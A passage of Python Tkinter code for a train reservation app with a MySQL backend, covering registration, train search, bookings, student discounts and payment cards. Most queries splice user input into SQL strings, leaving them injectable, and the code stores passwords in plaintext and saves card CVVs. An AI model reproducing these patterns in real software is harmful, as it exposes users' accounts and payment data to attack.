self.updateReservation)\n b3.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n b4 = Button(buttonsFrame, text =\"Cancel a reservation\", command = self.cancelRes)\n b4.grid(row = 3, column = 0, columnspan = 2, sticky = EW)\n b5 = Button(buttonsFrame, text =\"Give review\", command = self.giveReview)\n b5.grid(row = 4, column = 0, columnspan = 2, sticky = EW)\n b6 = Button(buttonsFrame, text =\"Add school information (student discount)\", command = self.schoolInfo)\n b6.grid(row = 5, column = 0, columnspan = 2, sticky = EW)\n b7 = Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b7.grid(row = 6, column = 0, columnspan = 2, sticky = EW)\n elif self.custOrManag == \"manager\":\n b8 = Button(buttonsFrame, text =\"View revenue report\", command = self.viewRevenueRep)\n b8.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b9 = Button(buttonsFrame, text =\"View popular route report\", command = self.viewpopRR)\n b9.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b10=Button(buttonsFrame, text =\"Log out\", command = self.logout)\n b10.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n\n def switchToRegister(self):\n self.primaryWin.withdraw()\n self.newUserWindow.deiconify()\n self.Register()\n #self.primaryWin.withdraw()\n\n def switchToLogin(self):\n self.newUserWindow.withdraw()\n self.primaryWin.deiconify()\n\n def switchtoMainMenu(self):\n self.primaryWin.withdraw()\n #self.primaryWindow.deiconify()\n self.mainMenu()\n\n def Register(self):\n self.newUserWindow.title(\"New User Registration\")\n frame=Frame(self.newUserWindow)\n frame.pack()\n frame2=Frame(self.newUserWindow)\n frame2.pack(side = BOTTOM)\n\n label1 = Label(frame,text = \"Username\", justify = LEFT)\n label1.grid(row = 0, column = 0, sticky = W)\n self.registeredUser = StringVar()\n self.uentry = Entry(frame, textvariable = self.registeredUser, width = 30, justify = RIGHT)\n self.uentry.grid(row = 0, column = 1, sticky = W)\n\n label2 = Label(frame,text =\"Email Address\", justify = LEFT)\n label2.grid(row = 1, column = 0, sticky = W)\n self.registerEmail = StringVar()\n self.email_entry = Entry(frame, textvariable = self.registerEmail, width = 30, justify = RIGHT)\n self.email_entry.grid(row = 1, column = 1, sticky = W)\n\n label3 = Label(frame,text = \"Password\", justify = LEFT)\n label3.grid(row = 2, column = 0, sticky = W)\n self.registeredPass = StringVar()\n self.password_entry = Entry(frame, textvariable = self.registeredPass, width = 30, justify = RIGHT)\n self.password_entry.grid(row = 2, column = 1, sticky = W)\n\n label4 = Label(frame,text =\"Confirm Password\", justify = LEFT)\n label4.grid(row = 3, column = 0, sticky = W)\n self.registeredPassConfirm = StringVar()\n self.confirm_password_entry = Entry(frame, textvariable = self.registeredPassConfirm, width = 30, justify = RIGHT)\n self.confirm_password_entry.grid(row = 3, column = 1, sticky = W)\n\n b_reg=Button(frame2, text =\"Create\", command = self.registerCredentials)\n b_reg.pack(side = BOTTOM)\n\n def registerCredentials(self):\n if self.registeredUser.get() == \"\" or self.registeredPass.get() == \"\" or self.registeredPassConfirm.get() == \"\" or self.registerEmail.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n if self.registeredPass.get() != self.registeredPassConfirm.get():\n messagebox.showerror(\"Error\", \"Passwords must match\")\n return\n\n db = self.Connect()\n cursor = db.cursor()\n query1 = \"SELECT * FROM USER \\\n WHERE USER.Username = '%s'\" % 
(self.registeredUser.get())\n\n cursor.execute(query1)\n result1 = cursor.fetchall()\n\n\n if len(result1) != 0:\n messagebox.showerror(\"Error\", \"Username already in use\")\n return\n\n querypatch = \"INSERT INTO USER(Username, Password) VALUES ('%s' , '%s')\" % (self.registeredUser.get(), self.registeredPass.get())\n cursor.execute(querypatch)\n result3 = cursor.fetchall()\n\n query2 = \"INSERT INTO CUSTOMER(Username, Email) \\\n VALUES ('%s', '%s')\" % (self.registeredUser.get(), self.registerEmail.get())\n cursor.execute(query2)\n result2 = cursor.fetchall()\n\n cursor.close()\n db.commit()\n db.close()\n self.switchToLogin()\n\n def schoolInfo(self):\n self.primaryWindow.destroy()\n self.schoolInfoWin = Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n frame1 = Frame(self.schoolInfoWin)\n frame2 = Frame(self.schoolInfoWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n self.emailaddress = StringVar()\n self.entry = Entry(frame1, textvariable = self.emailaddress, width = 30)\n self.entry.grid(row = 0, column = 1)\n label1 = Label(frame1,text = \"School Email Address\")\n label1.grid(row = 0, column = 0)\n label2 = Label(frame1,text = \"Your school email address ends with .edu\")\n label2.grid(row = 1, column = 0)\n\n b1 = Button(frame2, text =\"Back\", command = self.sMAINMENU)\n b1.grid(row = 2, column = 0)\n b2 = Button(frame2, text =\"Submit\", command = self.writeToDB)\n b2.grid(row = 2, column = 1)\n\n def writeToDB(self):\n server = self.Connect()\n cursor = server.cursor()\n query = \"UPDATE CUSTOMER SET Email = '%s' WHERE Username = '%s'\" % (self.emailaddress.get(),self.username.get())\n cursor.execute(query)\n if self.emailaddress.get()[-4:] == \".edu\":\n query = \"UPDATE CUSTOMER SET Is_student = 1 WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n server.commit()\n cursor.close()\n server.close()\n\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def logout(self):\n self.primaryWindow.destroy()\n self.primaryWin = Toplevel()\n self.Login()\n\n def sMAINMENU(self):\n self.schoolInfoWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def trainSchedule(self):\n self.primaryWindow.destroy()\n self.trainSchWin = Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n frame1 = Frame(self.trainSchWin)\n frame2 = Frame(self.trainSchWin)\n frame1.pack(side = TOP)\n frame2.pack(side = BOTTOM)\n label1 = Label(frame1,text = \"Train Number\")\n label1.pack(side=LEFT)\n\n self.trainNumber = IntVar()\n self.entry = Entry(frame1, textvariable = self.trainNumber, width = 10)\n self.entry.pack(side=RIGHT)\n\n b1 = Button(frame2, text =\"Search\", command = self.schedule)\n b1.pack(side=LEFT)\n\n def getTrainTree(self, frame):\n tree=Treeview(frame)\n tree.pack()\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"arrv\",\"dept\",\"stat\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"arrv\", text= \"Arrival Time\")\n tree.heading(\"dept\", text= \"Departure Time\")\n tree.heading(\"stat\", text= \"Station\")\n return tree\n\n def schedule(self):\n self.trainSchWin.destroy()\n self.scheduleWin = Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n\n frame1 = Frame(self.scheduleWin)\n frame1.pack()\n\n tree = self.getTrainTree(frame1)\n server = self.Connect()\n cursor = server.cursor()\n\n trainNum = self.trainNumber.get()\n query1 = \"SELECT * FROM STOP WHERE Train_Number = '%d'\" % (trainNum)\n\n cursor.execute(query1)\n results = 
cursor.fetchall()\n i = 0\n for result in results:\n tree.insert('', i, text='', values=(result[2], result[0],result[1], result[3]))\n i += 1\n\n b1 = Button(frame1, text =\"Back\", command = self.switchToMainMenu)\n b1.pack(side= BOTTOM)\n\n def switchToMainMenu(self):\n self.scheduleWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def searchTrain(self):\n self.primaryWindow.withdraw()\n self.findAvailWindow = Toplevel()\n\n self.findAvailWindow.title(\"Search Train\")\n frame = Frame(self.findAvailWindow)\n frame.pack(side=TOP)\n frame1=Frame(self.findAvailWindow)\n frame1.pack(side=TOP)\n frame2=Frame(self.findAvailWindow)\n frame2.pack(side=TOP)\n frame3=Frame(self.findAvailWindow)\n frame3.pack(side=TOP)\n\n location= Label(frame,text = \"Departs From\")\n location.grid(row = 0, column = 0, sticky = E)\n self.city = StringVar()\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Name FROM STATION\"\n cursor.execute(query)\n results = cursor.fetchall()\n\n option=OptionMenu(frame, self.city, results[0], *results)\n option.grid(row = 0, column = 1, sticky = W)\n\n arriveAt= Label(frame1,text =\"Arrive At\")\n arriveAt.grid(row = 1, column = 0, sticky = E)\n self.arrv = StringVar()\n\n option=OptionMenu(frame1, self.arrv, results[0], *results)\n option.grid(row = 1, column = 1, sticky = W)\n\n depDate= Label(frame2,text =\"Departure Date (YYYY-MM-DD)\")\n depDate.grid(row = 2, column = 0, sticky = E)\n self.date = StringVar()\n\n self.startDateEntry = Entry(frame2, textvariable = self.date, width = 10)\n self.startDateEntry.grid(row = 2, column = 1, sticky = W)\n\n b=Button(frame3, text =\"Find Trains\", command = self.departureInfo)\n b.pack(side=RIGHT)\n\n def selected(self):\n if self.v.get() %2 == 0:\n self.value = (floor(self.v.get()/2)) -1\n else:\n self.value = (floor(self.v.get()/2))\n\n def departureInfo(self):\n start_date = datetime.datetime.strptime(self.startDateEntry.get(), '%Y-%m-%d')\n if start_date < datetime.datetime.now():\n messagebox.showerror(\"Error\", \"Departure date cannot be in the past\")\n else:\n self.findAvailWindow.withdraw()\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n\n frame = Frame(self.departureWin)\n frame.pack(side=TOP)\n\n chosenCity = self.city.get()[2: len(self.city.get())-3]\n chosenArrv = self.arrv.get()[2: len(self.arrv.get())-3]\n chosenDate = self.date.get()\n\n server = self.Connect()\n cursor = server.cursor()\n\n stop1 = \"CREATE VIEW Stop1 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenCity)\n stop2 = \"CREATE VIEW Stop2 (Train_Number) AS SELECT Train_Number FROM STOP WHERE STOP.Name = '%s'\" % (chosenArrv)\n stops = \"CREATE VIEW Stops (Train_Number) AS SELECT Train_Number FROM Stop2 NATURAL JOIN Stop1\"\n # The SELECT below reads from the Stops view, so the helper views must be\n # (re)created first; previously these statements were built but never executed.\n cursor.execute(\"DROP VIEW IF EXISTS Stops\")\n cursor.execute(\"DROP VIEW IF EXISTS Stop1\")\n cursor.execute(\"DROP VIEW IF EXISTS Stop2\")\n cursor.execute(stop1)\n cursor.execute(stop2)\n cursor.execute(stops)\n query = \"SELECT STOP.Train_Number, STOP.Departure_Time, STOP.Arrival_Time, STOP.Name, TRAIN_ROUTE.First_Class_Price, TRAIN_ROUTE.Second_Class_Price FROM STOP, TRAIN_ROUTE, Stops \\\n WHERE (STOP.Train_Number = Stops.Train_Number) AND (TRAIN_ROUTE.Train_Number = Stops.Train_Number) AND (STOP.Name = '%s' OR STOP.Name = '%s')\" % (chosenCity, chosenArrv)\n\n cursor.execute(query)\n results = cursor.fetchall()\n\n departTime = []\n arriveTime = []\n\n for row in results:\n if str(row[3]) == chosenCity:\n departTime.append((row[1], row[3], row[0], row[4], row[5]))\n if str(row[3]) == chosenArrv:\n arriveTime.append((row[2], row[3], row[0], row[4], row[5]))\n self.duration = []\n for pair1 in departTime:\n for 
pair2 in arriveTime:\n if pair1[1] == chosenCity and pair2[1] == chosenArrv and pair1[2] == pair2[2]:\n self.duration.append((pair1[2],pair1[0],pair2[0],pair2[0] - pair1[0],pair1[3],pair1[4], pair1[1], pair2[1]))\n # 0: Train_Number, 1: Departure_Time, 2: Arrival_Time, 3: Duration, 4: First_Class_Price, 5: Second_Class_Price, 6: chosenCity, 7: chosenArrv\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 0, column = 0)\n l2 = Label(frame,text = \"Time (Duration)\").grid(row = 0, column = 2)\n l3 = Label(frame,text = \"1st Class Price\").grid(row = 0, column = 4)\n l4 = Label(frame,text = \"2nd Class Price\").grid(row = 0, column = 6)\n\n a = 1\n b = 1\n c = 2\n self.v = IntVar()\n for result in self.duration:\n Label(frame, text = str(result[0]), anchor = \"w\").grid(row = a, column = 0, sticky = \"ew\")\n Label(frame, text = str(result[1]) + \"-\" + str(result[2]) + \"\\n\" + str(result[3]), anchor = \"w\").grid(row = a, column = 2, sticky = \"ew\")\n Radiobutton(frame, text = str(result[4]), variable = self.v, value = b, command = self.selected).grid(row = a, column = 4, sticky = \"ew\")\n Radiobutton(frame, text = str(result[5]), variable = self.v, value = c, command = self.selected).grid(row = a, column = 6, sticky = \"ew\")\n a += 1\n b += 2\n c += 2\n\n self.row = a\n self.value1 = b\n self.value2 = c\n\n b1=Button(frame, text =\"Back\", command = self.switchtoSearchTrain)\n b1.grid(row = a, column = 0)\n b2=Button(frame, text =\"Next\", command = self.passengerInfo)\n b2.grid(row = a, column = 1)\n\n def switchtoSearchTrain(self):\n self.departureWin.destroy()\n self.findAvailWindow.deiconify()\n\n def passengerInfo(self):\n self.departureWin.withdraw()\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n\n frame = Frame(self.passengerInfoWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.passengerInfoWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.passengerInfoWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.passengerInfoWin)\n frame4.pack(side=TOP)\n\n baggage= Label(frame,text = \"Number of Bags\")\n baggage.pack(side=LEFT)\n self.bags = IntVar()\n choices = [\"1\", \"2\", \"3\", \"4\"]\n option=OptionMenu(frame, self.bags, choices[0], *choices)\n option.pack(side=RIGHT)\n disclamer = Label(frame2,text = \"Every passenger can bring up to 4 bags. 
2 free of charge, 2 for $30 per bag\")\n disclamer.pack()\n\n passName= Label(frame3,text =\"Passenger Name\")\n passName.pack(side=LEFT)\n self.name2 = StringVar()\n nameEnt = Entry(frame3, textvariable = self.name2, width = 10)\n nameEnt.pack(side = RIGHT)\n\n if self.v.get() % 2 == 0:\n self.classChosen = 2\n else:\n self.classChosen = 1\n\n b1=Button(frame4, text =\"Back\", command = self.switchToDepartureInfo)\n b1.pack(side=LEFT)\n b2=Button(frame4, text =\"Next\", command=self.updateTrainList)\n b2.pack(side=RIGHT)\n\n def switchToDepartureInfo(self):\n self.passengerInfoWin.destroy()\n self.departureWin.deiconify()\n\n def updateTrainList(self):\n price = 0\n if self.bags.get() < 3:\n bagPrice = 0\n else:\n extraBags = self.bags.get() - 2\n bagPrice = extraBags * 30\n if self.v.get()%2 == 0: #(if even 2nd class)\n self.chosenClass = 2\n price = self.duration[self.value][5]\n else:\n self.chosenClass = 1\n price = self.duration[self.value][4]\n\n self.price = StringVar()\n self.price = price + bagPrice\n self.trainChosen = self.duration[self.value][0]\n self.results1.append((self.trainChosen, self.duration[self.value][1], self.duration[self.value][2], self.duration[self.value][3],\n self.duration[self.value][6],self.duration[self.value][7],\n self.chosenClass, self.price, self.bags.get(), self.name2.get()))\n self.makeReservation()\n\n def makeReservation(self):\n self.passengerInfoWin.withdraw()\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n\n frame = Frame(self.reservationWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.reservationWin)\n frame2.pack(side=TOP)\n\n selected = Label(frame,text = \"Currently Selected\")\n selected.grid(row = 0, column = 0)\n\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 0)\n l2 = Label(frame,text = \"Time(Duration)\").grid(row = 1, column = 1)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 2)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 3)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 4)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =5)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 6)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 7)\n l9 = Label(frame,text = \"Remove\").grid(row = 1, column = 8)\n\n\n a = 2\n b = 1\n self.w = IntVar()\n\n for result in self.results1:\n lb1=Label(frame, text = str(result[0]), anchor = \"w\")\n lb1.grid(row = a, column = 0, sticky = \"ew\")\n lb2=Label(frame, text = str(result[1]) + \"-\" + str(result[2]) +\"\\n\" + str(result[3]), anchor = \"w\")\n lb2.grid(row = a, column = 1, sticky = \"ew\")\n lb3=Label(frame, text = str(result[4]), anchor = \"w\")\n lb3.grid(row = a, column = 2, sticky = \"ew\")\n lb4=Label(frame, text = str(result[5]), anchor = \"w\")\n lb4.grid(row = a, column = 3, sticky = \"ew\")\n lb5=Label(frame, text = str(result[6]), anchor = \"w\")\n lb5.grid(row = a, column = 4, sticky = \"ew\")\n lb6=Label(frame, text = str(result[7]), anchor = \"w\")\n lb6.grid(row = a, column = 5, sticky = \"ew\")\n lb7=Label(frame, text = str(result[8]), anchor = \"w\")\n lb7.grid(row = a, column = 6, sticky = \"ew\")\n lb8 = Label(frame, text = str(result[9]), anchor = \"w\")\n lb8.grid(row = a, column = 7, sticky = \"ew\")\n r1 = Radiobutton(frame, text = \"Remove\", variable = self.w, value = b, command = self.select2)\n r1.grid(row = a, column = 8,sticky = \"ew\")\n a = a + 1\n b += 9\n\n server = self.Connect()\n cursor = 
server.cursor()\n\n query = \"SELECT Student_Discount FROM SYSTEM_INFO\"\n cursor.execute(query)\n res = cursor.fetchall()\n discount = res[0][0]\n\n query = \"SELECT Is_student FROM CUSTOMER WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n result3 = cursor.fetchone()\n temp_price = 0\n for entry in self.results1:\n temp_price += entry[7]\n self.price = temp_price\n if result3[0] == 1:\n self.price = self.price*(1-discount/100)\n # Only advertise the discount when it has actually been applied.\n stuDis= Label(frame2,text = \"Student Discount Applied.\")\n stuDis.grid(row = 0, column = 0)\n\n totalC= Label(frame2, text = \"Total Cost\")\n totalC.grid(row = 1, column = 0)\n #cost = StringVar()\n costEnt = Label(frame2, text = self.price, width = 10)\n costEnt.grid(row = 1, column = 1)\n\n useCard= Label(frame2, text = \"Use Card\")\n useCard.grid(row = 4, column = 0)\n\n query = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query)\n results = cursor.fetchall()\n newRes = []\n for res in results:\n newRes.append(int(res[0]))\n\n self.card = IntVar()\n option=OptionMenu(frame2, self.card, newRes[0], *newRes)\n option.grid(row = 4, column = 1)\n\n b5=Button(frame2, text =\"Delete Card\", command = self.deleteCard)\n b5.grid(row = 4, column =2)\n b1=Button(frame2, text =\"Add Card\", command = self.addCard)\n b1.grid(row = 4, column =3)\n\n b2=Button(frame2, text =\"Continue adding a train\", command = self.switchToSearch)\n b2.grid(row = 5, column = 0)\n\n b3=Button(frame2, text =\"Back\", command = self.switchToPassengerInfo)\n b3.grid(row = 6, column = 0)\n b4=Button(frame2, text =\"Submit\", command = self.confirmation)\n b4.grid(row =6, column = 1)\n\n def switchToSearch(self):\n self.reservationWin.destroy()\n self.searchTrain()\n\n def switchToPassengerInfo(self):\n self.reservationWin. 
destroy()\n self.passengerInfoWin.deiconify()\n\n## def getCost(self):\n## total = 0\n## for button in self.checkButtonsInDetails:\n## if button.is_checked():\n## total += button.selectRoom()[5]\n## total += button.selectRoom()[2]\n## self.totalCost = total*self.numDays\n## totallabel5 = Label(self.checkDetailsFrame, text=str(self.totalCost))\n## self.totalCostVarLabel.pack(side=TOP)\n## totallabel5.pack(side=TOP)\n\n def addCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n\n frame = Frame(self.paymentIWin)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin)\n frame2.pack(side=TOP)\n frame3 = Frame(self.paymentIWin)\n frame3.pack(side=TOP)\n frame4 = Frame(self.paymentIWin)\n frame4.pack(side=TOP)\n frame5 = Frame(self.paymentIWin)\n frame5.pack(side=TOP)\n\n l1= Label(frame,text = \"Name on Card\")\n l1.pack(side=LEFT)\n l2= Label(frame2,text = \"Card Number\")\n l2.pack(side=LEFT)\n l3= Label(frame3,text = \"CVV\")\n l3.pack(side=LEFT)\n l4= Label(frame4,text = \"Expiration Date\")\n l4.pack(side=LEFT)\n\n self.name = StringVar()\n cardName = Entry(frame, textvariable = self.name, width = 10)\n cardName.pack(side = RIGHT)\n\n self.num = StringVar()\n cardNum = Entry(frame2, textvariable = self.num, width = 10)\n cardNum.pack(side = RIGHT)\n\n self.CVVnum = StringVar()\n Cvv = Entry(frame3, textvariable = self.CVVnum, width = 10)\n Cvv.pack(side = RIGHT)\n\n self.date1 = StringVar()\n expdate = Entry(frame4, textvariable = self.date1, width = 10)\n expdate.pack(side = RIGHT)\n\n b4=Button(frame5, text =\"Submit\", command = self.addCardCheck)\n b4.pack(side=LEFT)\n\n def addCardCheck(self):\n self.expDate = datetime.datetime.strptime(self.date1.get(), '%Y-%m-%d')\n if self.expDate <= datetime.datetime.now():\n messagebox.showerror(\"Error\", \"Your card is expired.\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM PAYMENT_INFO \\\n WHERE Card_Number = '%s'\" % (self.num.get())\n cursor.execute(query)\n results = cursor.fetchall()\n if len(results) != 0:\n messagebox.showerror(\"Error\", \"Card number already in use\")\n return\n elif self.expDate == \"\" or self.name.get() == \"\" or self.num.get() == \"\" or self.CVVnum.get() == \"\":\n messagebox.showerror(\"Error\", \"Expiration Date, Name, Number, and CVV must be filled\")\n return\n elif len(self.num.get()) != 10:\n messagebox.showerror(\"Error\", \"Card Number must be 10 digits\")\n return\n elif len(self.CVVnum.get()) != 3:\n messagebox.showerror(\"Error\", \"CVV must be 3 digits\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"INSERT INTO PAYMENT_INFO(Card_Number, CVV, Exp_Date, Name_on_card, Username) VALUES ('%s', '%s', '%s', '%s', '%s')\" % (self.num.get(), self.CVVnum.get(), self.expDate, self.name.get(), self.username.get())\n cursor.execute(query)\n result = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin.destroy()\n self.makeReservation()\n\n def deleteCard(self):\n self.reservationWin.withdraw()\n self.paymentIWin2= Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n\n frame = Frame(self.paymentIWin2)\n frame.pack(side=TOP)\n frame2 = Frame(self.paymentIWin2)\n frame2.pack(side=BOTTOM)\n cardNum = Label(frame, text = \"Card Number\")\n cardNum.pack(side=LEFT)\n\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Card_Number FROM PAYMENT_INFO WHERE Username = '%s'\" % (self.username.get())\n cursor.execute(query1)\n results = 
cursor.fetchall()\n\n self.cardNum = StringVar()\n self.cardNum.set(results[0][0])\n\n option=OptionMenu(frame, self.cardNum, results[0], * results)\n option.pack(side=RIGHT)\n\n b1=Button(frame2, text =\"Submit\", command = self.deleteCardCheck)\n b1.pack(side=BOTTOM)\n\n def deleteCardCheck(self):\n # Parse the selection only on submit; converting immediately after building\n # the OptionMenu ignored whatever the user picked. The menu stores a\n # stringified tuple, so slice out the ten digits.\n cardNum = int(self.cardNum.get()[1:11])\n server = self.Connect()\n cursor = server.cursor()\n query1 = \"SELECT Is_cancelled, Departure_Date FROM RESERVATION NATURAL JOIN RESERVES WHERE Card_Number ='%s'\" % (cardNum)\n cursor.execute(query1)\n results = cursor.fetchall()\n for row in results:\n self.departDate = row[1]\n # pymysql returns DATE columns as datetime.date, so compare dates with dates\n if self.departDate >= datetime.date.today() and row[0] == 0:\n messagebox.showerror(\"Error\", \"Card is being used for existing reservation\")\n return\n\n query2 = \"DELETE FROM PAYMENT_INFO WHERE Card_Number = '%s'\" % (cardNum)\n cursor.execute(query2)\n\n server.commit()\n cursor.close()\n server.close()\n self.paymentIWin2.destroy()\n self.makeReservation()\n\n def switchToConfirm1(self):\n self.paymentIWin.withdraw()\n self.confirmation()\n\n def switchToConfirm2(self):\n self.paymentIWin2.withdraw()\n self.confirmation()\n\n def backToMain(self):\n self.confirm.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def select2(self):\n self.index = floor(self.w.get()/9)\n self.results1.remove(self.results1[self.index])\n self.reservationWin.destroy()\n self.makeReservation()\n\n def confirmation(self):\n server = self.Connect()\n cursor = server.cursor()\n\n query = \"SELECT MAX(ReservationID) FROM RESERVATION\"\n cursor.execute(query)\n maxID = cursor.fetchall()\n # MAX() is NULL when the table is empty, so fall back to 0\n self.newReservationID = (maxID[0][0] or 0) + 1\n\n query1 = \"INSERT INTO RESERVATION(ReservationID, Is_cancelled, Username, Card_Number) VALUES ('%d', 0, '%s', '%d')\" % (self.newReservationID, self.username.get(),self.card.get())\n cursor.execute(query1)\n\n for res in self.results1:\n query2 = \"INSERT INTO RESERVES(ReservationID, Train_Number, Class, Departure_Date, Passenger_Name, Number_of_Bags, Departs_From, Arrives_At, Total_Cost) \\\n VALUES ('%d', '%d', '%d', '%s', '%s', '%d', '%s', '%s', '%f')\" % (self.newReservationID, self.trainChosen, self.classChosen, self.date.get(), res[9], res[6], res[4], res[5], res[7])\n cursor.execute(query2)\n\n self.reservationWin.destroy()\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n\n frame = Frame(self.confirm)\n frame.pack()\n\n label1 = Label(frame, text = \"Reservation ID:\")\n label1.grid(row = 0, column = 0,sticky=E)\n e1 = Label(frame, text = self.newReservationID, width = 10)\n e1.grid(row = 0, column = 1)\n label3 = Label(frame, text=\"Thank you so much for your purchase! 
Please save the reservation ID for your records.\")\n label3.grid(row = 2, column = 0, columnspan = 2)\n\n query = \"SELECT ReservationID FROM RESERVATION WHERE Card_Number = '%d'\" % (self.card.get())\n cursor.execute(query)\n results = cursor.fetchall()\n\n server.commit()\n cursor.close()\n server.close()\n\n self.entries = []\n self.results1 = []\n\n b=Button(frame, text =\"Go back to choose functionality\", command=self.backToMain)\n b.grid(row=3,column=1,sticky=E)\n\n def updateReservation(self):\n self.primaryWindow.destroy()\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n frame = Frame(self.updateWin)\n frame.pack()\n self.resID = IntVar()\n l1 = Label(frame, text = \"Reservation ID\")\n l1.grid(row = 0, column = 0, sticky = E)\n e1 = Entry(frame, textvariable = self.resID, width = 10)\n e1.grid(row = 0, column = 1)\n b1 = Button(frame, text = \"Search\", command = self.updateReservation2)\n b1.grid(row = 0, column = 2, sticky = E)\n b2 = Button(frame, text = \"Back\", command = self.switchMainMenu)\n b2.grid(row = 1, column = 1, sticky = E)\n\n def switchMainMenu(self):\n self.updateWin.destroy()\n self.primaryWindow = Toplevel()\n self.mainMenu()\n\n def update1(self):\n self.index = floor(self.w.get()/9)\n#####################table info, new dept date, change fee, updated cost,#################\n def updateReservation2(self):\n self.updateWin.withdraw()\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n\n frame = Frame(self.updateWin2)\n frame.pack()\n frame2 = Frame(self.updateWin2)\n frame2.pack()\n\n l0 = Label(frame,text = \"Select\").grid(row = 1, column = 0)\n l1 = Label(frame,text = \"Train(Train Number)\").grid(row = 1, column = 1)\n l2 = Label(frame,text = \"Date\").grid(row = 1, column = 2)\n l3 = Label(frame,text = \"Departs From\").grid(row = 1, column = 3)\n l4 = Label(frame,text = \"Arrives At\").grid(row = 1, column = 4)\n l5 = Label(frame,text = \"Class\").grid(row = 1, column = 5)\n l6 = Label(frame,text = \"Price\").grid(row = 1, column =6)\n l7 = Label(frame,text = \"# of baggages\").grid(row = 1, column = 7)\n l8 = Label(frame,text = \"Passenger Name\").grid(row = 1, column = 8)\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT * FROM RESERVES WHERE ReservationID = '%s'\" % (self.resID.get())\n cursor.execute(query)\n self.results = cursor.fetchall()\n\n a = 2\n b = 1\n self.w = IntVar()\n print(self.results)\n for result in self.results:\n Radiobutton(frame, variable = self.w, value = b, command = self.update1).grid(row = a, column = 0)\n Label(frame, text = str(result[1]), anchor = \"w\").grid(row = a, column = 1, sticky = \"ew\")\n\n l11 = Label(frame, text = str(result[3]), anchor = \"w\")\n l11.grid(row = a, column = 2, sticky = \"ew\")\n l12 = Label(frame, text = str(result[6]), anchor = \"w\")\n l12.grid(row = a, column = 3, sticky = \"ew\")\n l13 = Label(frame, text = str(result[7]), anchor = \"w\")\n l13.grid(row = a, column = 4, sticky = \"ew\")\n l14 = Label(frame, text = str(result[2]), anchor = \"w\")\n l14.grid(row = a, column = 5, sticky = \"ew\")\n l15 =Label(frame, text = str(result[8]), anchor = \"w\")\n l15.grid(row = a, column = 6, sticky = \"ew\")\n l16 = Label(frame, text = str(result[5]), anchor = \"w\")\n l16.grid(row = a, column = 7, sticky = \"ew\")\n l17 = Label(frame, text = str(result[4]), anchor = \"w\")\n l17.grid(row = a, column = 8, sticky = \"ew\")\n a = a + 1\n b += 9\n\n b1 = Button(frame2, text = \"Back\", command = 
self.switchUpdateReservation)\n b1.pack(side = LEFT)\n b2 = Button(frame2, text = \"Next\", command = self.updateReservation3)\n b2.pack(side = RIGHT)\n\n def switchUpdateReservation(self):\n self.updateWin2.destroy()\n #self.updateWin = Toplevel()\n self.updateReservation()\n\n def switchUpdateReservation2(self):\n self.updateWin3.destroy()\n self.updateReservation2()\n\n def updateTree2(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 2, column = 0)\n tree[\"show\"] = \"headings\"\n tree[\"columns\"]=(\"train\",\"date\", \"dept\", \"arrv\", \"class\", \"pr\", \"bag\", \"name\")\n tree.heading(\"train\", text= \"Train (Train Number)\")\n tree.heading(\"date\", text = \"Date\")\n tree.heading(\"dept\", text= \"Departs From\")\n tree.heading(\"arrv\", text= \"Arrives At\")\n tree.heading(\"class\", text= \"Class\")\n tree.heading(\"pr\", text= \"Price\")\n tree.heading(\"bag\", text= \"# of Baggages\")\n tree.heading(\"name\", text= \"Passenger Name\")\n return tree\n\n def updateTree3(self, frame):\n tree=Treeview(frame)\n tree.grid(row = 4, column = 0, sticky = E)\n tree[\"show\"] = \"headings\"\n 